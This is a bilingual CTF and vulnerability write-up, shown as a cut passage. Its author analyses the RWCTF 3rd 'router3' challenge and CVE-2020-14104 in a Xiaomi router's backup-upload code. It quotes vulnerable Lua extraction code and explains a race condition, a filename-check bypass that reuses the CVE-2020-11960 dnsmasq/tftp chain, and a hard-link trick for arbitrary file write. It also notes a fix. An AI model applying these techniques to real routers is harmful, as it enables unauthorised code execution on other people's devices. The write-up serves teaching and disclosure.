class="p">:</span><span class="n">close</span><span class="p">()</span> <span class="kr">return</span> <span class="mi">3</span> <span class="kr">end</span> <span class="n">wcl</span><span class="p">:</span><span class="n">close</span><span class="p">()</span> <span class="c1">----------------------------------------------------------</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;cd /tmp; mkdir &#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="o">..</span><span class="s2">&#34;; cd &#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="o">..</span><span class="s2">&#34;; tar -xzf &#34;</span><span class="o">..</span><span class="n">tarpath</span><span class="o">..</span><span class="s2">&#34; &gt;/dev/null 2&gt;/dev/null&#34;</span><span class="p">)</span> <span class="o">&lt;&lt;---</span> <span class="n">d</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;rm &#34;</span><span class="o">..</span><span class="n">tarpath</span><span class="o">..</span><span class="s2">&#34; &gt;/dev/null 2&gt;/dev/null&#34;</span><span class="p">)</span> <span class="kr">if</span> <span class="ow">not</span> <span class="n">fs.access</span><span class="p">(</span><span class="s2">&#34;/tmp/&#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="o">..</span><span class="s2">&#34;/cfg_backup.des&#34;</span><span class="p">)</span> <span class="kr">then</span> <span class="o">&lt;&lt;---</span> <span class="n">e</span><span class="mf">.1</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;rm -rf /tmp/&#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="p">)</span> <span class="kr">return</span> <span class="mi">2</span> <span class="kr">end</span> <span class="kr">if</span> <span class="ow">not</span> <span class="n">fs.access</span><span class="p">(</span><span class="s2">&#34;/tmp/&#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="o">..</span><span class="s2">&#34;/cfg_backup.mbu&#34;</span><span class="p">)</span> <span class="kr">then</span> <span class="o">&lt;&lt;---</span> <span class="n">e</span><span class="mf">.2</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;rm -rf /tmp/&#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="p">)</span> <span class="kr">return</span> <span class="mi">3</span> <span class="kr">end</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;mv /tmp/&#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="o">..</span><span class="s2">&#34;/* /tmp; rm -rf /tmp/&#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="p">)</span> <span class="o">&lt;&lt;---</span> <span class="n">f</span> <span class="kr">return</span> <span class="mi">0</span> <span class="kr">end</span> </code></pre></td></tr></table> </div> </div><p>The <code>x</code> part code snippet checks whether there are only 2 files in the archive, which should kick the unintended solution out(I hope so).</p> <p>I will give you a minute to try to pwn this new version challenge.</p> <p><!-- raw HTML omitted --></p> <p>OK, let&rsquo;s continue. When we upload a normal archive(all checks passed), the above steps can be presented as follow:</p> <p><img src="../pic/RWCTF-3rd_router3_&amp;_CVE_2020_14104/normal.png" alt=""></p> <p>But when some checks failed(for example, there is no <code>cfg_backup.des</code>), there will be an extra <code>rm</code> operation:</p> <p><img src="../pic/RWCTF-3rd_router3_&amp;_CVE_2020_14104/fail.png" alt=""></p> <p>See the problem? If we have two threads T1 and T2, T2&rsquo;s <code>rm -rf /tmp/bkcfg_tmp</code> happens right before T1&rsquo;s <code>cd bkcfg_tmp</code>, the <code>cd </code> operation of T1 will fail and the actual extraction will be in directory <code>/tmp/</code> again</p> <p><img src="../pic/RWCTF-3rd_router3_&amp;_CVE_2020_14104/race.png" alt=""></p> <p>So it&rsquo;s a race-condition bug in the file system. That&rsquo;s why I give teams huge number of times to try for demo(5 minutes * 2 attempts * 5 times).</p> <p>Plus, for this vuln, too many concurrent requests will have lower success rate because every upload request will do <code>mkdir</code> operation at first and change the existence of the directory <code>/tmp/bkcfg_tmp</code>.</p> <p>And here is my demo-show screenshot!</p> <p><img src="../pic/RWCTF-3rd_router3_&amp;_CVE_2020_14104/demo.png" alt=""></p> <p><strong>See you in RWCTF 4th!</strong></p> <blockquote> <p>For those who are curious about how to fix this vuln. Using the <code>-C</code> parameter of <code>tar</code> should be good.</p> <pre><code> -C, --directory=DIR Change to DIR before performing any operations. This option is order-sensitive, i.e. it affects all options that follow. </code></pre> </blockquote> <h2 id="conclusion">Conclusion</h2> <ol> <li>COVID-19 sucks. We could have had a more wonderful on-site final</li> <li>don&rsquo;t copy &amp; paste code without fully understanding it</li> <li>learning historical vulns is helpful to find new vulns</li> </ol> <p>Here I want to thank <a href="https://sec.xiaomi.com/">MiSRC</a> for allowing me to make this challenge upon their vuln. I always hold the opinion that security is the attitude. We have seen many cases that some vendors try to refuse or cover their vulnerabilities deliberately. Vendors shouldn&rsquo;t be afraid of people talking about their vulnerabilities. This only makes their products more secure. MiSRC just set an amazing example for these vendors using an open and positive attitude.</p> <h2 id="reference">Reference</h2> <p>[1]. <a href="https://github.com/feicong/lua_re">https://github.com/feicong/lua_re</a></p> <p>[2]. <a href="https://bbs.pediy.com/thread-216969.htm">https://bbs.pediy.com/thread-216969.htm</a></p> <hr> <h1 id="rwctf-3rd-router3--cve-2020-14104-writeup">RWCTF-3rd router3 &amp; CVE-2020-14104 writeup</h1> <p>在第三届RWCTF<!-- raw HTML omitted -->[1]<!-- raw HTML omitted -->中，我出了一道名为router3<!-- raw HTML omitted -->[2]<!-- raw HTML omitted -->的题目，考察了选手的逆向能力和漏洞挖掘能力。恭喜CodeR00t<!-- raw HTML omitted -->[3]<!-- raw HTML omitted -->，Bushwhackers<!-- raw HTML omitted -->[4]<!-- raw HTML omitted -->和Sauercloud<!-- raw HTML omitted -->[5]<!-- raw HTML omitted -->在比赛中解出了这道题目。</p> <p><img src="../pic/RWCTF-3rd_router3_&amp;_CVE_2020_14104/coder00t.png" alt=""></p> <blockquote> <p><code>CodeR00t</code>拿到一血</p> </blockquote> <p>接下来我会分享<code>router3</code>和相关漏洞<code>CVE-2020-14104</code>的writeup</p> <h2 id="writeup-for-router3-1">Writeup for router3</h2> <h3 id="题目信息">题目信息</h3> <p><code>router3</code>的题目信息如下：</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">router3 Score: 477 web reverse demo Geez, you can access some internal and experimental API using an awesome bug now! Try to exploit the [router](https://rwctf2021.s3-us-west-1.amazonaws.com/router3-a2dcb2d91d0654c87ffce982a86b8794723e76d6.tar.gz) completely next! **root password is not set in the above attachments, but set in the demo environment** </code></pre></td></tr></table> </div> </div><p>附件信息如下：</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">rwctf@rwctf:~/Desktop$ tar tvf router3.tar.gz -rw-r--r-- root/root <span class="m">268435456</span> 2021-01-08 04:20 openwrt-armvirt-32-root.ext4 -rwxr-xr-x root/root <span class="m">1880792</span> 2021-01-08 03:51 openwrt-armvirt-32-zImage -rw-r--r-- root/root <span class="m">1838</span> 2021-01-09 20:19 readme.md -rwxr-xr-x root/root <span class="m">749</span> 2021-01-08 03:54 start.sh rwctf@rwctf:~/Desktop$ cat start.sh <span class="c1">#!/bin/sh</span> <span class="nv">IMAGE</span><span class="o">=</span>openwrt-armvirt-32-zImage <span class="nv">LAN</span><span class="o">=</span>ledetap0 <span class="nv">DRIVE</span><span class="o">=</span>openwrt-armvirt-32-root.ext4 <span class="c1"># create tap interface which will be connected to OpenWrt LAN NIC</span> ip tuntap add mode tap <span class="nv">$LAN</span> ip link <span class="nb">set</span> dev <span class="nv">$LAN</span> up <span class="c1"># configure interface with static ip to avoid overlapping routes</span> ip addr add 192.168.1.101/24 dev <span class="nv">$LAN</span> qemu-system-arm <span class="se">\ </span><span class="se"></span> -device virtio-net-pci,netdev<span class="o">=</span>lan <span class="se">\ </span><span class="se"></span> -netdev tap,id<span class="o">=</span>lan,ifname<span class="o">=</span><span class="nv">$LAN</span>,script<span class="o">=</span>no,downscript<span class="o">=</span>no <span class="se">\ </span><span class="se"></span> -device virtio-net-pci,netdev<span class="o">=</span>wan <span class="se">\ </span><span class="se"></span> -netdev user,id<span class="o">=</span>wan <span class="se">\ </span><span class="se"></span> -drive <span class="nv">file</span><span class="o">=</span><span class="nv">$DRIVE</span>,format<span class="o">=</span>raw,if<span class="o">=</span>virtio -append <span class="s1">&#39;root=/dev/vda rootwait&#39;</span> <span class="se">\ </span><span class="se"></span> -M virt -nographic -m <span class="m">256</span> -kernel <span class="nv">$IMAGE</span> <span class="c1"># cleanup. delete tap interface created earlier</span> ip addr flush dev <span class="nv">$LAN</span> ip link <span class="nb">set</span> dev <span class="nv">$LAN</span> down ip tuntap del mode tap dev <span class="nv">$LAN</span> rwctf@rwctf:~/Desktop$ file openwrt-armvirt-32-* openwrt-armvirt-32-root.ext4: Linux rev 1.0 ext2 filesystem data <span class="o">(</span>mounted or unclean<span class="o">)</span>, <span class="nv">UUID</span><span class="o">=</span>57f8f4bc-abf4-655f-bf67-946fc0f9f25b <span class="o">(</span>extents<span class="o">)</span> <span class="o">(</span>large files<span class="o">)</span> openwrt-armvirt-32-zImage: ARM OpenFirmware FORTH Dictionary, Text length: -509607936 bytes, Data length: -509607936 bytes, Text Relocation Table length: -369098749 bytes, Data Relocation Table length: <span class="m">24061976</span> bytes, Entry Point: 0x00000000, BSS length: <span class="m">1880792</span> bytes </code></pre></td></tr></table> </div> </div><p>提供给了选手一个通过qemu启动，基于openwrt<!-- raw HTML omitted -->[6]<!-- raw HTML omitted -->的mips虚拟机。在<code>readme.md</code>中描述了选手的目标是更改<code>/www/index.html</code>，也就是需要实现任意文件写或者RCE</p> <p>总结以上信息：</p> <ul> <li>题目类型？ <ul> <li>web &amp; reverse</li> </ul> </li> <li>提供给选手的附件 <ul> <li>一个mips虚拟机</li> </ul> </li> <li>选手需要达成的目标 <ul> <li>RCE（任意文件写最终可以转化为RCE）</li> </ul> </li> </ul> <h3 id="分析题目">分析题目</h3> <p>题目的标签是<code>web</code>和<code>reverse</code>。使用<code>start.sh</code>启动虚拟机后，通过<code>netstat</code>和<code>ps</code>的结果可以看出唯一和<code>web</code>有关的进程是nginx<!-- raw HTML omitted -->[7]<!-- raw HTML omitted --></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">root@OpenWrt:/# netstat -antpl netstat: showing only processes with your user ID Active Internet connections <span class="o">(</span>servers and established<span class="o">)</span> Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp <span class="m">0</span> <span class="m">0</span> 0.0.0.0:80 0.0.0.0:* LISTEN 935/nginx.conf -g d ...... root@OpenWrt:/# ps PID USER VSZ STAT COMMAND ...... <span class="m">935</span> root <span class="m">2404</span> S nginx: master process /usr/sbin/nginx -c /etc/nginx/ <span class="m">958</span> root <span class="m">2452</span> S nginx: worker process ..... </code></pre></td></tr></table> </div> </div><p>并且虚拟机中启用了luci<!-- raw HTML omitted -->[8]<!-- raw HTML omitted -->，</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">root@OpenWrt:~# ls /www/ cgi-bin index.html luci-static root@OpenWrt:~# ls /www/cgi-bin/ cgi-backup cgi-download cgi-exec cgi-upload luci </code></pre></td></tr></table> </div> </div><h4 id="luci--luasup9sup--ucisup10sup">luci = lua<!-- raw HTML omitted -->[9]<!-- raw HTML omitted --> + uci<!-- raw HTML omitted -->[10]<!-- raw HTML omitted --></h4> <p>简单来说，luci是一种MVC<!-- raw HTML omitted -->[11]<!-- raw HTML omitted -->框架，主要使用了Lua语言实现后端（更多的细节请参考官方文档）</p> <p><img src="../pic/RWCTF-3rd_router3_&amp;_CVE_2020_14104/MVC.svg" alt=""></p> <p>在MVC框架中，用户可以直接交互的是<code>controller</code>，对应到题目也就是<code>/usr/lib/lua/luci/controller</code>部分的代码</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">root@OpenWrt:~# ls /usr/lib/lua/luci/controller/ -R /usr/lib/lua/luci/controller/: admin api firewall.lua opkg.lua /usr/lib/lua/luci/controller/admin: index.lua network.lua uci.lua /usr/lib/lua/luci/controller/api: index.lua system.lua </code></pre></td></tr></table> </div> </div><p>与标准的openwrt系统相比较，可以发现题目环境中多了<code>/usr/lib/lua/luci/controller/api/system.lua</code>。那么很明显这也就是选手应该关注的代码了。</p> <p>从文件系统中拿到<code>system.lua</code>后可以发现这是一个ELF文件，<del>因此启动IDA pro开始逆向</del></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">rwctf@rwctf:~/Desktop$ file system.lua system.lua: ELF 32-bit invalid byte order <span class="o">(</span>SYSV<span class="o">)</span> rwctf@rwctf:~/Desktop$ hexdump -C -n <span class="m">20</span> ./system.lua <span class="m">00000000</span> 7f <span class="m">45</span> 4c <span class="m">46</span> <span class="m">01</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">00</span> <span class="m">05</span> <span class="p">|</span>.ELF............<span class="p">|</span> <span class="m">00000010</span> <span class="m">02</span> <span class="m">00</span> <span class="m">03</span> <span class="m">00</span> <span class="p">|</span>....<span class="p">|</span> <span class="m">00000014</span> rwctf@rwctf:~/Desktop$ chmod +x system.lua <span class="p">;</span> ./system.lua Hello world </code></pre></td></tr></table> </div> </div><p>之前已经说过<code>luci</code>的后端多是由lua实现的，如果我们在虚拟机中查看lua版本的话，立刻就可以发现虚拟机中使用了一个更改过的lua binary</p> <p><img src="../pic/RWCTF-3rd_router3_&amp;_CVE_2020_14104/lua.png" alt=""></p> <p>这里也就是题目标签<code>reverse</code>所设立的考点了。选手在审计lua代码挖掘漏洞之前，必须先做一些逆向工作找到lua被改了哪些部分并写出反编译器。网上已经有很多详细的教程，我在这里就不再赘述如何一步一步逆向并写反编译器了。在文末有一些参考链接<!-- raw HTML omitted -->[11] [12]<!-- raw HTML omitted -->和题目中应用的diff文件<!-- raw HTML omitted -->[13]<!-- raw HTML omitted -->。</p> <h3 id="cve-2020-11960sup14sup">CVE-2020-11960<!-- raw HTML omitted -->[14]<!-- raw HTML omitted --></h3> <p>在更进一步分析题目之前，我们先看一下另一个相关的漏洞CVE-2020-11960。我在去年的HITCON会议上展示过该漏洞的挖掘和利用过程（slides<!-- raw HTML omitted -->[15]<!-- raw HTML omitted -->的33~55页）。这里简要叙述一下如何利用该漏洞：</p> <ol> <li>通过上传文件时文件名检测的不严格上传两个文件<code>/tmp/hack_des.sh</code>和<code>/tmp/dnsmasq.d/mbu.conf</code>，其中<code>hack_des.sh</code>是一个包含了任意命令的shell脚本，<code>mbu.conf</code>是dnsmasq<!-- raw HTML omitted -->[16]<!-- raw HTML omitted -->的配置文件</li> <li>通过某种方式重启dnsmasq，加载<code>mbu.conf</code></li> <li>通过<code>tftp</code>传输文件，触发<code>mbu.conf</code>中指定的<code>hack_des.sh</code></li> </ol> <p>其中后两步是具体的利用，漏洞主要发生在第一步，攻击者首先需要能够在<code>/tmp</code>目录下上传包含特殊内容且文件名符合要求的文件。</p> <h3 id="选手writeup">选手writeup</h3> <p>回到题目上。为了节省选手的时间，我删除了大量<code>system.lua</code>中的代码，只保留了少部分接口。观察如下<code>/api/system/c_upload</code>接口的相关代码</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-lua" data-lang="lua"><span class="c1">-- /usr/lib/lua/luci/controller/api/system.lua</span> <span class="n">entry</span><span class="p">({</span><span class="s2">&#34;api&#34;</span><span class="p">,</span> <span class="s2">&#34;system&#34;</span><span class="p">,</span> <span class="s2">&#34;c_upload&#34;</span><span class="p">},</span> <span class="n">call</span><span class="p">(</span><span class="s2">&#34;cUpload&#34;</span><span class="p">),</span> <span class="p">(</span><span class="s2">&#34;&#34;</span><span class="p">),</span> <span class="mi">153</span><span class="p">,</span> <span class="mh">0x09</span><span class="p">)</span> <span class="o">&lt;&lt;---</span> <span class="n">a</span> <span class="kr">function</span> <span class="nf">cUpload</span><span class="p">()</span> <span class="p">......</span> <span class="kd">local</span> <span class="n">uploadFilepath</span> <span class="o">=</span> <span class="s2">&#34;/tmp/cfgbackup.tar.gz&#34;</span> <span class="p">......</span> <span class="kd">local</span> <span class="n">ext</span> <span class="o">=</span> <span class="n">XQBackup.extract</span><span class="p">(</span><span class="n">uploadFilepath</span><span class="p">)</span> <span class="p">......</span> <span class="kr">end</span> <span class="c1">-- /usr/lib/lua/xiaoqiang/module/XQBackup.lua</span> <span class="kd">local</span> <span class="n">TMPDIR</span> <span class="o">=</span> <span class="s2">&#34;bkcfg_tmp&#34;</span> <span class="kr">function</span> <span class="nf">extract</span><span class="p">(</span><span class="n">filepath</span><span class="p">)</span> <span class="kd">local</span> <span class="n">fs</span> <span class="o">=</span> <span class="n">require</span><span class="p">(</span><span class="s2">&#34;nixio.fs&#34;</span><span class="p">)</span> <span class="kd">local</span> <span class="n">tarpath</span> <span class="o">=</span> <span class="n">filepath</span> <span class="kr">if</span> <span class="ow">not</span> <span class="n">tarpath</span> <span class="kr">then</span> <span class="n">tarpath</span> <span class="o">=</span> <span class="n">TARMBUFILE</span> <span class="kr">end</span> <span class="kr">if</span> <span class="ow">not</span> <span class="n">fs.access</span><span class="p">(</span><span class="n">tarpath</span><span class="p">)</span> <span class="kr">then</span> <span class="kr">return</span> <span class="mi">1</span> <span class="kr">end</span> <span class="kr">if</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;tar -tzvf &#34;</span><span class="o">..</span><span class="n">tarpath</span><span class="o">..</span><span class="s2">&#34; | grep ^l &gt;/dev/null 2&gt;&amp;1&#34;</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span> <span class="kr">then</span> <span class="o">&lt;&lt;---</span> <span class="n">b</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;rm -rf &#34;</span><span class="o">..</span><span class="n">tarpath</span><span class="p">)</span> <span class="kr">return</span> <span class="mi">2</span> <span class="kr">end</span> <span class="kr">if</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;tar -tzvf &#34;</span><span class="o">..</span><span class="n">tarpath</span><span class="o">..</span><span class="s2">&#34; | grep -v .des | grep -v .mbu &gt;/dev/null 2&gt;&amp;1&#34;</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span> <span class="kr">then</span> <span class="o">&lt;&lt;---</span> <span class="n">c</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;rm -rf &#34;</span><span class="o">..</span><span class="n">tarpath</span><span class="p">)</span> <span class="kr">return</span> <span class="mi">22</span> <span class="kr">end</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;cd /tmp; mkdir &#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="o">..</span><span class="s2">&#34;; cd &#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="o">..</span><span class="s2">&#34;; tar -xzf &#34;</span><span class="o">..</span><span class="n">tarpath</span><span class="o">..</span><span class="s2">&#34; &gt;/dev/null 2&gt;/dev/null&#34;</span><span class="p">)</span> <span class="o">&lt;&lt;---</span> <span class="n">d</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;rm &#34;</span><span class="o">..</span><span class="n">tarpath</span><span class="o">..</span><span class="s2">&#34; &gt;/dev/null 2&gt;/dev/null&#34;</span><span class="p">)</span> <span class="kr">if</span> <span class="ow">not</span> <span class="n">fs.access</span><span class="p">(</span><span class="s2">&#34;/tmp/&#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="o">..</span><span class="s2">&#34;/cfg_backup.des&#34;</span><span class="p">)</span> <span class="kr">then</span> <span class="o">&lt;&lt;---</span> <span class="n">e</span><span class="mf">.1</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;rm -rf /tmp/&#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="p">)</span> <span class="kr">return</span> <span class="mi">2</span> <span class="kr">end</span> <span class="kr">if</span> <span class="ow">not</span> <span class="n">fs.access</span><span class="p">(</span><span class="s2">&#34;/tmp/&#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="o">..</span><span class="s2">&#34;/cfg_backup.mbu&#34;</span><span class="p">)</span> <span class="kr">then</span> <span class="o">&lt;&lt;---</span> <span class="n">e</span><span class="mf">.2</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;rm -rf /tmp/&#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="p">)</span> <span class="kr">return</span> <span class="mi">3</span> <span class="kr">end</span> <span class="n">os.execute</span><span class="p">(</span><span class="s2">&#34;mv /tmp/&#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="o">..</span><span class="s2">&#34;/* /tmp; rm -rf /tmp/&#34;</span><span class="o">..</span><span class="n">TMPDIR</span><span class="p">)</span> <span class="o">&lt;&lt;---</span> <span class="n">f</span> <span class="kr">return</span> <span class="mi">0</span> <span class="kr">end</span> </code></pre></td></tr></table> </div> </div><p>有以下关键点：</p> <p><strong>(a)</strong>. <code>/api/system/c_upload</code>的第四个参数(order<!-- raw HTML omitted -->[16]<!-- raw HTML omitted -->)是9，即该接口无需认证即可访问（在题目描述中也暗示了这一点：<code>you can access some internal and experimental API using an awesome bug now</code>）</p> <p><strong>(b)</strong>. 检查上传的<code>.tar.gz</code>压缩包中是否有软链接文件</p> <p><strong>(c)</strong>. 检查压缩包中文件的文件名是否以<code>.des</code>或者<code>.mbu</code>结尾</p> <p><strong>(d)</strong>. 创建一个新的文件夹<code>/tmp/bkcfg_tmp</code>，并在新文件夹下完成解压的步骤</p> <p><strong>(e)</strong>. 检查<code>/tmp/bkcfg_tmp/cfg_backup.des</code>和<code>/tmp/bkcfg_tmp/cfg_backup.mbu</code>是否被释放</p> <p><strong>(f)</strong>. 拷贝<code>/tmp/bkcfg_tmp</code>下的文件到<code>/tmp/</code>，然后删除<code>/tmp/bkcfg_tmp</code></p> <p>其中**(c)**部分的代码包含与<code>CVE-2020-11960</code>一样的缺陷，只检查了文件名中是否包含<code>des</code>和<code>mbu</code>字符串而非检查是否以<code>.des</code>或<code>.mbu</code>结尾，关于这一点，也可以参考<a href="https://zhuanlan.zhihu.com/p/245070099">实战逻辑漏洞：三个漏洞搞定一台路由器</a>。</p> <p>和<code>CVE-2020-11960</code>相比，文件的解压都在<code>/tmp/bkcfg_tmp</code>下完成，看起来<code>CVE-2020-11960</code>的利用手法在这里不适用。但仔细检查**(e)**和**(f)**部分的代码，如果我们上传一个压缩包，压缩包中刚好有两个文件名为<code>cfg_backup.mbu</code>和<code>cfg_backup.des</code>的文件，**(e)**处的检查就会通过，进而在**(f)**处，<code>/tmp/bkcfg_tmp</code>下的文件又被重新拷贝回<code>/tmp</code>。通过构造特殊的压缩包，我们就可以再次获得在<code>/tmp</code>目录下上传特殊文件的能力，接下来的利用也就和<code>CVE-2020-11960</code>一样了。而比赛中<code>Bushwhackers</code>和<code>Sauercloud</code>正是使用了这样的方法。</p> <p><img src="../pic/RWCTF-3rd_router3_&amp;_CVE_2020_14104/bushwhackers.png" alt=""></p> <blockquote> <p>Bushwhackers的exploit</p> </blockquote> <p><img src="../pic/RWCTF-3rd_router3_&amp;_CVE_2020_14104/sauercloud.png" alt=""></p> <blockquote> <p>Sauercloud的黑页</p> </blockquote> <p>这种解法并不是预期解，出题的过程中我犯了一些错误导致所有的队伍都使用了非预期解法。但解出题目的队伍在短短48h就写出了反编译器并找到了漏洞，证明了他们身为世界顶级战队的实力。</p> <h3 id="非预期中的非预期">非预期中的非预期</h3> <p>在举办CTF比赛时，我们很乐意看到非预期解，尤其是能让我们学到东西的非预期解法。在比赛中，<code>CodeR00t</code>虽然也使用了同一个bug，但他们完全没有使用<code>dnsmasq</code>相关的利用手法，而是找到了一种新的利用思路。</p> <p><img src="../pic/RWCTF-3rd_router3_&amp;_CVE_2020_14104/coder00t_exp.png" alt=""></p> <p>上图是<code>CodeR00t</code>的exploit，他们使用了硬链接<!-- raw HTML omitted -->[17]<!-- raw HTML omitted -->来绕过**(b)**处的检查，在<code>tar -tzvf</code>的结果中，硬链接以<code>h</code>开头，而**(b)**处只检查了是否以<code>l</code>开头。**(b)**处的检查绕过后，利用硬链接的特性，攻击者可以实现**完整的任意写文件**。</p> <blockquote> <p>busybox精简了大量的命令，在虚拟机中使用<code>tar -tzvf</code>时甚至看不到硬链接以<code>h</code>开头</p> <p><img src="../pic/RWCTF-3rd_router3_&amp;_CVE_2020_14104/hardlink.png" alt=""></p> </blockquote> <p>这种利用方法也能用到<code>CVE-2020-11960</code>上:P</p> <h2 id="writeup-for-cve-2020-14104-1">Writeup for CVE-2020-14104</h2> <p>接下来我会介绍题目的预期解法以及我如何犯了一个错误导致了非预期解的产生。</p> <p><code>router3</code>实际上重现了一遍<code>CVE-2020-14104</code>，<code>CVE-2020-14104</code>是一个<code>CVE-2020-11960</code>的<strong>部分</strong>不完整修复。<strong>部分</strong>的意思是该修复方法使得该处不能RCE，但在检查过程中的疏忽导致该漏洞仍然可以造成诸如LPE之类的危害。为了让题目可RCE，我修改了（ctrl^c+ctrl^v）小米代码的部分逻辑，但只拷贝了旧版固件的解压部分代码，而没有拷贝新版固件中的检查部分代码。</p> <p>下边是带有检查的<code>/api/system/c_upload</code>接口代码（与小米原生的逻辑不同）</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 